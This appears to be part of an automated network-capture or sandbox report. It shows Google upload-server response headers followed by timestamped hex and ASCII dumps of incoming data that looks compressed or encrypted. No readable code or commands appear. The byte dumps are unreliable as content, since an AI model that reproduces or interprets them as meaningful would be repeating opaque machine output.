X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context Access-Control-Allow-Methods: GET,HEAD,OPTIONS Content-Length: 207936 Date: Fri, 05 Aug 2022 09:32:58 GMT Expires: Fri, 05 Aug 2022 09:32:58 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=3MI7Fw== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close
2022-08-05 09:32:58 UTC	6	IN	Data Raw: 78 08 1f af 40 f6 79 04 b6 a5 f3 a5 cc 51 3c a0 a4 35 7c 0a 4e d6 6e 39 5d b5 2f 26 2f 11 5d c6 ef 31 9d d0 e4 fc e4 b6 e5 f7 0d ad e9 d1 03 f4 e6 5b d1 87 28 0b 45 ff c4 38 e2 93 e6 45 fa 01 ac 82 20 52 94 47 fc 46 80 bd 4e 77 d8 d5 ad ad 8b 8d 56 0d 42 d4 87 2e c5 c6 f0 e5 be 37 4b c9 72 2e 73 6e 37 c1 5e 0b 5e f4 d5 8c 8b ec fa 3f 0a e3 7f 50 fc 51 b8 2c 8e 15 bd 46 03 a0 0a 4b 66 0c 98 53 a7 bb 86 0d e3 4a 6c 80 b3 9d 3e 9c 76 a5 46 95 75 f0 13 cb 46 28 2d a6 7d 09 02 a0 d6 e3 ae 65 f9 b9 93 34 ec df 1b 50 b8 a2 84 7c b6 3a 50 5d fb f6 0a 8f f3 bd b2 81 3f 9d e9 34 a4 22 54 c1 ab db f6 33 bb cb 0e 89 a6 53 14 7c da 30 4d c0 f7 01 22 51 d6 85 d6 95 1f ac 47 08 61 70 27 98 c1 bf 12 97 4a a3 fc e0 a2 b3 c9 fd dd 74 e5 71 c1 da 21 85 1e 27 e4 c4 1a d2 96 Data Ascii: x@yQ<5\|Nn9]/&/]1[(E8E RGFNwVB.7Kr.sn7^^?PQ,FKfSJl>vFuF(-}e4P\|:P]?4"T3S\|0M"QGap'Jtq!'
2022-08-05 09:32:58 UTC	10	IN	Data Raw: 78 9c 38 d0 b9 c8 8b d3 9c ab 13 ff 3d e1 92 ec 1f 4e 89 68 92 a3 46 66 c4 13 6a 1f 84 db e6 22 0f 65 0b 9b 9c e1 da a6 4c ba 4d da 3d 9d bd 4e 73 0a 2c 86 ae 15 a6 a2 27 40 cc 9e 03 97 e0 8b fc be 37 4f ca 6b 30 5e 64 11 ae 30 0b 5e fe ff aa a0 00 dc 14 fe e0 4f 5a fc 60 b8 2c 8e 15 bd 46 83 a2 16 5e 45 19 04 26 be 0f 8f c4 ef f4 46 cf 58 97 9e de 1d cc 71 c8 14 b9 0f a0 27 45 09 c6 02 7e 41 c4 84 c7 a3 6f d9 cb ec 70 ea 9d 9e 56 d7 1e d7 5c db 56 04 32 d5 dc 07 85 d7 bd b2 81 3f 9f f2 2d d9 6d 72 ba fd da f5 37 37 ea cc de 80 78 e0 56 d8 28 51 ed 1b 27 57 4a dd 84 d4 fa 6f 64 46 02 4b 34 0d 6a c1 bc 22 9d d8 63 fd e0 a2 93 c9 fd dd 76 f0 6b ec d0 47 fe 04 07 e4 c0 37 d6 bd cc ea 47 7f 20 fe e6 71 8e c3 88 9d 6b de 54 9e f1 de f5 90 36 03 50 ce 5c 60 2a Data Ascii: x8=NhFfj"eLM=Ns,'@7Ok0^d0^OZ`,F^E&FXq'E~AopV\V2?-mr77xV(Q'WJodFK4j"cvkG7G qkT6P\`*
2022-08-05 09:32:58 UTC	13	IN	Data Raw: 2b 9f df f6 2e 2f b5 15 b3 63 e1 d8 b6 7a 23 47 fc 40 ac dc 4e 77 2d f4 ad 87 19 8d 57 1d 42 d4 87 2e 98 c6 a8 90 be 17 0d c9 72 2f 68 5e 32 c1 f5 0a 5e f4 ff 8c 8b fd 84 42 0a e3 7b 70 d8 71 68 32 a6 ea bd 46 85 88 a2 4b 68 19 35 70 ac 29 89 e8 6c f2 6d c6 53 ba 41 f7 15 fd 95 cf 01 b7 db b9 27 4f 13 e8 30 41 6b e7 89 c2 cc 06 c7 e6 c3 7c c5 a0 ef 09 ce ed d7 5d aa 67 34 38 d4 e3 2a 92 f1 c3 8a 81 3f 99 e1 1c 4d 67 54 cb f1 f5 d8 18 13 e7 cc 0f ab 78 cd 70 f1 d7 45 40 2f 01 2c 54 d4 93 4a e1 15 64 46 13 e1 25 26 98 c5 c1 25 97 d8 40 d5 80 a3 93 cf 7d eb 74 e7 75 d9 d3 ef 32 09 5e f7 c3 09 d4 ae 25 cc 6c 8b 18 f9 02 78 b3 cf ae e4 63 db 5d 8b 9a 35 8c d8 3c 29 77 94 e6 60 29 d6 01 c1 5e be 08 da 6a 0c f6 2c 94 1a 38 72 10 7a ea 5d dc af b1 8e cd d9 48 27 Data Ascii: +./cz#G@Nw-WB.r/h^2^B{pqh2FKh5p)lmSA'O0Ak\|]g48*?MgTxpE@/,TJdF%&%@}tu2^%lxc]5<)w`)^j,8rz]H'
2022-08-05 09:32:58 UTC	17	IN	Data Raw: 8d 56 07 5b f9 90 08 87 e6 f5 c6 6e 29 63 36 72 2e 75 46 9f c1 5e 01 44 d9 d3 aa a0 ea f1 14 ed ef 54 50 f4 79 16 2c 8e 1f 91 5a 8b 88 a5 4b 68 19 38 70 b7 29 86 d6 ea 05 6d cc 74 94 92 f4 1f dc 6d 3b 30 92 5f 57 2f 57 0c ed e5 67 6c c5 8a 39 cc 00 d3 e3 5e 5a cc bc ab 50 d9 c5 9b 5c db 5f 27 3c c4 ff 27 b6 f4 6d ac a9 c0 9d e9 32 dc d3 54 c1 e1 f2 94 33 1a e6 39 dd a1 79 6a 7d ca 30 4d c0 17 24 2c 68 80 84 f0 d3 1f 64 47 13 51 11 26 f4 c1 bf 12 aa d8 44 ec 9e df 93 c9 f9 fd a4 c3 a1 df f2 9e 85 1e 01 cc 6c 1a d0 9c d2 e1 67 ad 0d d4 52 6d a3 c5 83 e1 5a dd 5f b1 6d bb df 97 14 d2 76 e5 a4 79 04 dc 5a d6 76 10 0c c8 65 29 e8 03 80 4e 89 f8 2a 66 c7 5f 8b 43 94 84 e7 5f 88 39 cc 20 93 ac f4 47 2b 1e e4 57 d6 58 ba ba 0a ac d1 56 09 ba 94 54 09 06 0a f1 0c Data Ascii: V[n)c6r.uF^DTPy,ZKh8p)mtm;0_W/Wgl9^ZP\_'<'m2T39yj}0M$,hdGQ&DlgRmZ_mvyZve)N*f_C_9 G+WXVT
2022-08-05 09:32:58 UTC	18	IN	Data Raw: f9 5b 30 96 af 69 3c 2c e6 3b 30 77 1e 30 f1 c8 d1 b4 0b 81 a9 13 7d c4 2f 58 42 34 cf bd 50 0a 9e d9 41 ba 12 da ac f1 33 9d 25 bb 45 10 5c f8 b8 e2 77 b6 12 57 c0 bf cc 58 ab f6 01 3a e9 b0 98 6a cd 0c 4b 8c 8e f3 37 2b 64 ae 42 82 70 c8 17 01 d5 68 e5 70 47 1f ed e2 9a b9 71 4a 7b 95 00 7a 58 d0 b7 ee 45 34 24 6c 6c 21 ab fb f8 52 ee ee 24 6d d3 f2 dc f2 a2 ed f5 76 c6 8c 6e e6 ec f6 70 3a 14 e3 b2 bc 20 4f ad e1 72 35 5c 1f f9 98 ca d1 44 e1 0e 5e 5f 1d 6f ab c5 93 14 e6 cc 78 fb 5a eb 7a 7a 0c 02 54 6c 63 9a 74 d9 29 f1 a0 10 fb b1 e9 cc a6 be 3b 79 08 29 91 99 9c fc 5e 89 42 9e 36 aa c9 42 b0 1f ec 61 98 d7 3b e3 76 5c 79 b8 e0 86 82 b3 b1 9e f0 79 7a 3a 81 96 24 4d 53 03 ca dd dc 52 2b 24 9e 58 fe e2 7a 79 aa fb c4 f0 91 38 00 a7 86 e5 06 8b 28 16 Data Ascii: [0i<,;0w0}/XB4PA3%E\wWX:jK7+dBphpGqJ{zXE4$ll!R$mvnp: Or5\D^_oxZzzTlct);y)^B6Ba;v\yyz:$MSR+$Xzy8(
2022-08-05 09:32:58 UTC	19	IN	Data Raw: 6d c0 5a 4f 72 6e 31 d4 73 27 78 fd ba f5 8b ec f0 3d 22 ec 7e 50 f6 5c b1 04 ef 14 bd 40 8f a9 65 32 68 13 28 5a af 19 a7 be c2 f2 67 da 80 bd 60 2a 2d db 4d 2e 0c b4 a6 9c 0f 09 0d c5 16 74 68 de a6 e3 8e 25 09 d5 ce a5 cc b6 73 58 48 ed d7 5a f3 34 34 38 df 25 0d 8c fb bb bb ee 46 9d e9 3e 28 71 7e c7 cd db e9 33 1a ec e7 c9 a6 15 4e 7c fa 76 4d c0 16 03 2c 44 dd e2 aa 95 15 64 46 08 61 09 16 9c c1 30 12 97 d8 01 fd e0 b3 bb 5f fd dd 72 cb 74 1c 58 61 85 1e 79 d5 c4 1a d4 be df cd 6c 81 22 09 fc 6d a9 e9 d0 d7 71 de 50 b2 0f af f5 96 11 30 08 d4 ae 60 2d ff 76 df 5e b4 24 17 6f 05 ed 56 b2 42 a2 0f 0a 6b eb 5c a7 e3 a3 8f cc ae 28 08 e9 08 db bb 9b a0 26 17 ce 8c df 9b 82 94 8b d3 d1 50 25 70 a5 54 0f 2a 04 e2 0d 98 6a 35 4e bc 6c 60 f4 22 bc 0e f6 2b Data Ascii: mZOrn1s'x="~P\@e2h(Zg`-M.th%sXHZ448%F>(q~3N\|vM,DdFa0_rtXayl"mqP0`-v^$oVBk\(&P%pTj5Nl`"+
2022-08-05 09:32:58 UTC	20	IN	Data Raw: e5 39 24 4b 75 7e ec f5 df 75 b2 9d 82 5e 36 ce 22 69 74 cb b0 92 bc 2c 22 a7 3e e4 06 87 1c 12 f9 ac b4 14 95 ed 69 e5 62 b0 8e 87 4f cc c8 99 b6 58 b6 b7 84 8e bb 77 60 3a 8b a4 ec 16 4b 80 39 11 12 ff ff 2e e5 8a 28 e0 2a 37 c3 27 09 40 37 93 fb 13 2e 2a 86 f2 9d db 1a b1 0d 21 6f 84 5d 9a 68 51 8b 2b 73 7d af 52 d7 75 ac f4 6b 39 e6 35 06 d0 51 66 8e 06 18 df 68 62 3b 18 be ba ef 17 01 85 7a c3 8d 83 3a f2 e5 f3 22 66 a3 6c 60 1a 51 58 f0 0a be e5 41 ff eb 52 14 4b b9 d9 e6 ec 2c 0a 03 f3 3b 37 87 50 56 88 80 1b 56 90 b6 be 5a 23 76 44 4f 02 43 db 69 23 4d f2 b7 88 0b a9 84 ef 16 2d 1b 21 85 ee b3 11 2b 56 02 dc 47 c6 59 48 ec e0 99 19 23 df e1 5f 8f 1e a1 7e ef 81 fc 6a 92 26 9e 37 c7 f7 9b 32 56 a5 45 94 12 8c 90 f1 cf 96 2f 8e dd fe 96 0f 65 0d b3 Data Ascii: 9$Ku~u^6"it,">ibOXw`:K9.(7'@7.!o]hQ+s}Ruk95Qfhb;z:"fl`QXARK,;7PVVZ#vDOCi#M-!+VGYH#_~j&72VE/e
2022-08-05 09:32:58 UTC	21	IN	Data Raw: c4 96 f2 c6 a4 92 e4 af be 70 20 0e 9e 74 3d 08 bb ef 24 67 60 eb 6f d9 66 8a d1 00 dc 22 88 6c 3a cc 0f 7f be 96 3d 5d 2b f3 8c 35 b9 f7 c7 d8 ae 2d cb 00 36 7f c7 8a 86 5b 8c 11 5f 35 28 e7 77 d6 bb ac 49 ca af ec 10 c1 b2 17 16 ff af d2 be 2a 9b 82 09 73 3f 0f 7f 6e 3a f5 b0 87 46 9e df 63 14 3f c2 8c de 72 69 01 61 85 3b a8 d3 5e f0 75 04 38 89 c8 85 ac 48 ab fc df 39 e2 9b 3b 05 e5 29 1d 8c 8e f2 34 06 6e a7 43 82 54 8e 17 01 d4 6b f5 a7 60 ea f3 ca 65 b9 71 4c 78 81 08 41 66 ec 95 d4 b2 3d fb 54 6c 73 ab fb f4 52 b2 ee 24 61 d1 01 f7 1e 82 dc 37 73 fb 96 4c cd 92 d0 5b c3 59 e3 b2 be 6e 76 ad 44 76 0c d5 20 f9 98 a5 98 2d e0 0a 37 19 30 23 87 db 96 50 c1 e7 1e 98 f7 11 68 7e 22 75 1c 6d 69 8a 37 5a 0e f7 dd 03 d3 f8 ec e1 a7 fa 46 72 23 dc bc f2 d0 Data Ascii: p t=$g`of"l:=]+5-6[_5(wI*s?n:Fc?ria;^u8H9;)4nCTk`eqLxAf=TlsR$a7sL[YnvDv -70#Ph~"umi7ZFr#
2022-08-05 09:32:58 UTC	23	IN	Data Raw: a0 c8 8b d7 9f b7 0e d0 2d dd d0 86 39 66 2d 42 b4 8e 80 66 c4 10 69 34 be d3 d6 ea 0f 65 0b c8 9c e1 c9 b2 3d 1e 46 fc 40 ff b0 4e 77 23 37 80 a4 15 8e 6f a1 42 d4 87 05 86 cc db 10 bc 20 5d d1 6a a3 01 6e 37 c0 47 26 74 d2 dc 9a 89 83 73 3e 0a e5 04 5c fc 51 bc 8e 87 02 bf 29 0a a1 0a 4d 13 18 22 5d a3 83 c7 c0 c2 f3 cf c5 56 0a 6a f4 19 fd 65 e8 2c 4b 72 94 35 47 62 4c 1d 67 6a b4 ae c3 cc 04 f1 7b e6 5a ca 68 2b 76 fe 82 5e 5d db 53 4f 34 d5 fb 03 ea e4 bd b2 87 e1 d6 cc 1c b8 67 54 cb ff f7 d4 15 3a d8 c0 0d b8 7b eb 7c da 36 4f af 9e 00 2c 56 a6 88 d0 95 1b 4c 1a 08 61 18 2a 9e ec b1 39 94 d3 6f 20 e7 aa bb 7d fd dd 72 cc 79 c7 dd 69 ad ad 07 e4 c2 32 b1 96 cf c6 b2 8d 08 d4 52 6d a3 c9 84 e7 61 de 54 9a 9e fb f5 b8 40 29 33 a3 ae 60 28 cc 4c da 5e Data Ascii: -9f-Bfi4e=F@Nw#7oB ]jn7G&ts>\Q)M"]Vje,Kr5GbLgj{Zh+v^]SO4gT:{\|6O,VLa*9o }ryi2RmaT@)3`(L^
2022-08-05 09:32:58 UTC	24	IN	Data Raw: 8b 56 44 c2 c2 85 7c 0a 2c 34 de 63 9c 1d 79 49 f1 a6 1c 0d fb e3 e7 40 c3 41 50 6a 2f 97 bb fb 5b 80 81 3f 1a c9 bc c1 44 98 4f 82 02 9e b8 b5 3e 60 da 3e 90 ac 83 fc 8a de 0d f5 55 76 6c f2 97 24 4f 10 6b e0 de dc a7 95 18 c5 75 e4 ce 21 e5 aa fb c4 32 bc 52 5b 8f cb e0 26 ce 1c c4 f0 09 39 14 95 ea 73 c4 4e b9 2c 84 74 e0 df 8a b5 5b 2e a6 82 95 60 e1 44 7e a3 ae e7 3e 20 5e 35 33 80 ff d5 27 c1 ea 38 e0 20 e9 c3 36 0c de e6 80 f2 44 2b 3b 81 6f 1a ed c2 83 70 21 6f c9 4a b2 42 2e f5 21 ad 77 88 5a 0a 53 7c e0 4e ee 87 35 00 f2 66 66 a6 9f 30 77 6e 4a a4 02 93 b7 b7 6e 29 2b 7e e3 0f bd 31 d9 ce 76 09 95 db 35 1e 65 5b 72 f2 02 d8 c6 91 eb eb 86 15 4b b9 ec 22 e6 0a 07 35 e1 5c 9c 87 78 d8 a2 8b 36 84 a1 87 fa 5a 6d 76 44 61 3c 4e e0 78 77 75 f2 b7 8d Data Ascii: VD\|,4cyI@APj/[?DO>`>Uvl$Oku!2R[&9sN,t[.`D~> ^53'8 6D+;op!oJB.!wZS\|N5ff0wnJn)+~1v5e[rK"5\x6ZmvDa<Nxwu
2022-08-05 09:32:58 UTC	25	IN	Data Raw: 96 cf cc 7c 8b 0a fc e2 6d a3 cf 82 e6 71 de 6e 9a 9e af bd 90 3c 29 5d b7 a1 60 52 52 7c de 5a 96 db c8 6f 03 cc 6c 8c 42 d9 8e 22 7a ee 74 75 9d b1 88 e7 92 59 27 92 8d df ac f0 65 ff 17 c4 90 d9 a0 ab 92 8e 29 d1 50 25 26 4e 54 0f 28 40 eb 03 98 1b 6e 69 b6 43 a3 0a 0a f0 08 dd 2d 35 cc 70 d7 a9 e8 0e 75 f7 f7 a4 11 92 f7 cd cf 90 1e ee 2b 1a ff 8a 8a d8 5f a7 00 23 6e b2 9e 3b cf 96 ae 1e 5c 84 e6 3a 22 41 26 15 d5 f4 48 ca 8b 81 af 10 48 15 23 7e 4f ec c3 45 78 46 98 f3 40 8b d6 c8 a1 04 13 7a 31 6e 5b 72 a3 f8 b8 bb 5f 02 03 55 d0 0d d4 10 ab fc de 48 aa 9b 7e 41 fc 20 6a aa 8c e4 ad 42 cf a7 64 83 4c a3 3f 27 d6 73 4f 03 0a 3a ed e3 eb f4 71 4a 7a 89 30 76 52 c8 88 54 dd bb f4 72 45 d4 a2 fc f6 7c 2f 30 24 67 fd 0d d1 d9 69 fc f3 a5 ec 8d ac cd 08 Data Ascii: \|mqn<)]`RR\|ZolB"ztuY'e)P%&NT(@niC-5pu+_#n;\:"A&HH#~OExF@z1n[r_UH~A jBdL?'sO:qJz0vRTrE\|/0$gi
2022-08-05 09:32:58 UTC	27	IN	Data Raw: cb e4 22 4b 15 69 45 b4 60 50 57 a4 98 35 8a 7f 86 ba 5c 7e 70 4c 5e 39 5c c3 1b 8f 5c b8 b6 8c 03 81 04 cf d9 23 50 0c ea a4 b4 39 c8 5e 13 d3 71 0d 8b 27 ac ff b4 1a 0d c8 cf 87 e1 54 aa a0 c2 83 c6 9a a8 1e b1 e5 a8 b7 80 1f 44 8b 53 b2 96 c9 92 80 ad 68 2f 84 d3 c7 27 dd 0a 41 9a 9c eb d0 a1 54 88 5f 9f 94 eb f7 4f 77 2d 22 c2 e6 32 8d 5c 1e 45 c2 ed 3d 8d d0 e3 ec 95 06 5a c1 7a 3f 7a 01 7b c0 5e 01 30 ac c6 84 9a e4 eb 37 15 f7 1d 08 ef 59 a9 24 9f 1d a2 4a e7 c1 19 43 60 02 2b 4b c8 42 8e c0 c8 e3 64 db 26 af 63 e5 16 c7 61 d6 ce 8e 7c a8 2f 59 6f 9d 0f 6f 7d c7 b3 cb d3 16 bd aa f5 52 dd be 64 78 e3 f3 b5 04 c8 5d 25 30 df fd 26 a6 f0 32 7f 6b 24 79 9c 55 fe 19 01 c1 e7 de f3 5c e3 ec e7 db a0 40 1e a2 d2 21 46 e8 9d 01 2c 5a 01 95 da bf 1f 64 47 Data Ascii: "KiE`PW5\~pL^9\\#P9^q'TDSh/'AT_Ow-"2\E=Zz?z{^07Y$JC`+KBd&ca\|/Yoo}Rdx]%0&2k$yU\@!F,ZdG
2022-08-05 09:32:58 UTC	28	IN	Data Raw: 2a 74 ca 9b e6 4e 10 f4 74 94 c2 ab fb fc 52 41 ee 24 6d d3 c0 dc f2 a2 27 c3 73 e0 a4 60 8b 08 d0 51 eb f3 e3 b2 a9 c0 52 ad 44 70 1d 1a 20 f9 92 f3 45 2d e0 08 88 5d 30 23 8f eb fd 53 e7 c6 56 73 dc ea 7c 54 e4 2a 1c 6b 4b 6c 1b 51 2e d9 49 16 d3 fe c0 22 a0 d1 43 50 f8 2f 97 b7 fc fe 6e 85 2d 01 37 aa cf 44 98 54 ed 63 80 ad 92 f6 50 72 3e 90 ac 8d 80 ae c2 20 fd 5f 6a 78 e5 6e 24 4b 79 78 c7 f5 3c 5f b2 c2 89 66 d4 c3 09 bf ab fb ce 86 bc 2c 37 a7 f4 e5 06 87 ea 35 ee 21 c4 3c d3 ec 64 e6 1b f8 2d 8e 6d c8 ce b9 40 f7 22 b7 ee ae 4d 9e 48 76 8d 89 e1 1e da 07 15 1b a6 d5 cf a0 a5 8b 38 e1 31 0d 49 27 09 c9 98 95 ee 75 e4 1b 8d 6d cb ba 7c 98 6b 47 0a ab 38 ff 1f b1 f3 3c 53 83 a6 a3 27 35 1a 8f 25 a3 83 53 66 9d 26 60 96 2c 16 a8 2f 51 57 67 f5 d7 ac Data Ascii: tNtRA$m's`QRDp E-]0#SVs\|TkKlQ.I"CP/n-7DTcPr> _jxn$Kyx<_f,75!<d-m@"MHv81I'um\|kG8<S'5%Sf&`,/QWg
2022-08-05 09:32:58 UTC	29	IN	Data Raw: 37 f4 67 0b d2 e2 d9 ed 6b e4 e7 e6 dd a0 42 11 25 c9 36 5c c6 01 2e 3d 7a d9 82 f5 82 47 6e 42 19 67 37 31 c0 d2 b9 83 0b c9 40 ea b9 87 80 cd eb ef 63 e1 78 f3 38 4a 94 1a 01 c1 d3 42 da 94 cc e9 7b d3 f4 f7 fd 6d 32 53 a8 ef 4e a5 ab 65 61 85 f5 8b 0c 2f 76 27 ab 60 29 b9 7c de 4f c0 55 c8 6f 01 c2 30 ae 4a 84 23 ab 7a ea 56 86 99 a2 af e7 51 28 7e e9 08 db ae 9b 41 27 17 c2 8c df 8e 82 94 d9 bf fa 53 2b 25 6c 52 11 03 6d d7 d1 11 65 eb 69 a5 67 a0 26 74 aa 0e f6 25 00 aa 09 52 a9 c0 c1 5d 2b fd be 3a da d1 e5 f0 82 2e e7 36 1c a3 ac f4 db 5f a7 15 01 fa ba ff 73 af 8a 82 3f 32 8c 94 3a 3a 6c 43 5c 83 e2 d2 b4 3c ac e7 37 42 25 02 1f 6e fb ee 8e 0b 15 9f d9 41 ba 12 fd ac 88 4e 69 01 6f 7b 7e ba f8 b8 f5 5a 62 73 4b eb a6 8b 49 ae eb 86 2a e7 8a 78 51 Data Ascii: 7gkB%6\.=zGnBg71@cx8JB{m2SNea/v'`)\|OUo0J#zVQ(~A'S+%lRmeig&t%R]+:.6_s?2::lC\<7B%nANio{~ZbsKI*xQ
2022-08-05 09:32:58 UTC	30	IN	Data Raw: 82 61 be e4 33 65 e8 b2 62 24 33 6d f2 5a 57 f8 57 60 e9 a0 71 1f 13 28 15 08 71 2c 13 8e 3c eb 11 29 2a 69 df 96 b6 2b c8 fa d1 f7 95 dd 15 71 0f 77 45 e7 39 31 9f c9 ed c3 4a 3b 5a a2 49 e8 e6 0a 0c 06 77 59 8f 98 7b 47 b3 95 21 bd 9a 9a ab 45 fc eb 55 50 2b 1b c8 67 4c 2c e3 aa be e3 98 0b ba 93 32 33 d4 8f c5 a7 11 85 57 02 dc 7e 72 4f 59 fa 70 dd 7f 52 d8 c9 5f 84 0f b0 bf b7 9a cc 86 e8 56 c9 55 9f ee 9a 0e 55 a3 d8 2c 90 aa 6e cd e5 78 3c d6 fb ae 68 01 65 6a 8a 87 c1 d5 b5 52 97 18 9d 55 a6 af 6c 05 3e 2a ad dd 1b d5 57 0d 48 de 96 39 a8 86 f6 cd e7 36 4b c3 78 50 2a 6e 37 c5 5c 0d 31 f9 d4 8c 8d 92 a3 3f 0a e7 10 5a fd 51 be 0c 33 15 bd 46 b0 bc 74 11 68 13 26 32 a1 0e 8f c6 d6 72 37 cc 7e b8 7e d1 9f 88 66 e5 03 1f 2f b9 27 41 0b d6 3c b9 64 de Data Ascii: a3eb$3mZWW`q(q,<)i+qwE91J;ZIwY{G!EUP+gL,23W~rOYpR_VUU,nx<hejRUl>WH96KxP*n7\1?ZQ3Fth&2r7~~f/'A<d
2022-08-05 09:32:58 UTC	32	IN	Data Raw: 4b a0 3d b9 e2 f6 13 6d 2d 67 53 2f fb f4 b0 e3 6d ce 04 5b ed 5f a4 72 ab fc df 2a d2 9f 7e d9 e5 0d 5b ff 8e f3 26 34 1f c2 64 82 50 9b 3a 16 f2 6d 5b 13 5a 17 fe c4 9d ae 12 5d 56 98 3b 6f 73 dd c8 91 a4 3b fd 78 6f 39 a0 d0 15 76 2c 01 22 6e 74 00 dc f2 a6 8c bf 73 e0 a2 5b c9 0e d9 d4 e4 14 e3 b0 d4 78 4c ad 40 66 cb 5d 33 fc 89 df a1 03 e4 1f 5d 6b 0c 25 84 4c 9c 53 e7 ce 7a e9 b4 ea 7a 78 1b 2f 30 47 65 95 94 76 28 f1 a4 15 ae 9f e8 cc a4 d3 60 03 6e 2f 97 b5 c1 a5 23 e9 2d 1e 33 a8 b4 22 98 54 e9 69 af be bd ca 7d 5b 7f 96 86 8e 95 ed d3 04 f6 4b e8 04 c0 bc b4 4b 7f 52 f2 ee d4 79 f3 30 89 75 90 c4 09 95 a5 fb b5 6f bc 2c 22 98 92 a1 01 8d 3a 14 ec 21 c6 14 9c ec 64 ec 4b b8 2c 8e 70 e6 c9 99 8f 70 0e b7 a8 84 65 7b 7b 76 8b a4 cd 03 02 8f 38 1b Data Ascii: K=m-gS/m[_r*~[&4dP:m[Z]V;os;xo9v,"nts[xL@f]3]k%LSzzx/0Gev(`n/#-3"Ti}[KKRy0uo,":!dK,ppe{{v8
2022-08-05 09:32:58 UTC	33	IN	Data Raw: b8 0d 0a a2 a7 0f 89 62 c4 e5 4d f1 57 6c 74 dc e0 d6 66 e3 a5 99 6c 99 01 6c dd db 34 98 6c cf a4 61 ca 19 f9 1b cc 8a d2 9e 8a 70 fc eb 75 5a c1 75 ee 12 05 e5 2f 7a d7 bd b4 23 39 86 c9 f3 de b7 4a e9 18 da f5 35 b8 ea fb fd 57 79 c4 62 f2 cf 4d c0 11 a3 2a 4d fd 7e fa 45 01 4c b9 08 61 14 84 9e df 9f f6 bd 08 5a d5 1f a2 93 cf 5f db 6b ee 51 2f f0 b1 9b 36 f8 e4 c4 1c 72 90 d0 c6 4c 13 20 2c e2 45 5c cf ae e0 d3 d8 4b 91 be 2a df 40 22 01 89 e5 ae 66 8b d1 63 d2 7e 31 26 18 71 2d 18 28 83 44 00 0d 3d 77 ca e5 87 4d af a6 33 a4 56 21 4b 0e c0 a2 d4 ee 0c c7 da be 0d 88 a4 94 57 aa ce 5f 01 a2 be 84 11 06 94 f1 0c 9e c2 ed 76 a6 67 dd fb da ee 26 09 21 3a ca a9 54 b6 f9 2a 1e 01 27 ba 3f 47 f7 cd c9 21 28 f2 39 11 b2 a0 5a 98 77 58 11 21 7e 8a e1 6c dc Data Ascii: bMWltfll4lapuZu/z#9J5WybMM~ELaZ_kQ/6rL ,E\K@"fc~1&q-(D=wM3V!KW_vg&!:T*'?G!(9ZwX!~l
2022-08-05 09:32:58 UTC	34	IN	Data Raw: 5c d1 45 a2 63 44 7d 0c d1 aa 85 b9 8d 56 07 9e d2 ad 2e 84 d6 f0 e5 bc 37 5e c9 5f 6c 73 69 37 c1 5e 0b 45 c4 d1 8c e5 ec fa 3f 28 e3 7f 41 fe 2a d6 2c 8e 11 a8 6b 8a 86 0c 63 e1 13 22 57 8c 0c 85 eb 37 f0 16 a2 7e bc 6e f7 70 5a 66 e5 0d b3 5b bb 5c 2b 0d c5 18 64 03 42 a2 c3 c6 04 f1 99 e6 5a c6 d9 26 70 fc e7 fb 5e 05 7a 36 43 bb fb 07 81 d4 b9 9a d3 3f 9d e3 5b 7a 67 54 cb 39 c1 f7 48 74 ec e7 d9 a5 57 3c 2e da 30 47 af 98 01 2c 5a 03 83 d6 bd 95 64 46 02 bd 38 49 fc c0 af 12 97 da 44 e8 e0 f3 f5 c9 fa dd 74 e7 71 da ea 62 85 2d 07 e4 c4 39 d0 96 de ce 17 e5 0a fc f8 7b 8f c6 88 e1 59 57 54 9a 94 84 f6 9b 17 dc 74 9e c0 60 29 d3 7f b1 d2 be 0c c2 71 28 e4 0e 5d 48 a8 20 d9 7d c2 d6 ad 9d bb 52 ca 8e 56 26 f9 08 df ae f4 58 26 02 ee 96 f5 88 a4 92 f5 Data Ascii: \EcD}V.7^_lsi7^E?(A*,kc"W7~npZf[\+dBZ&p^z6C?[zgT9HtW<.0G,ZdF8IDtqb-9{YWTt`)q(]H }RV&X&
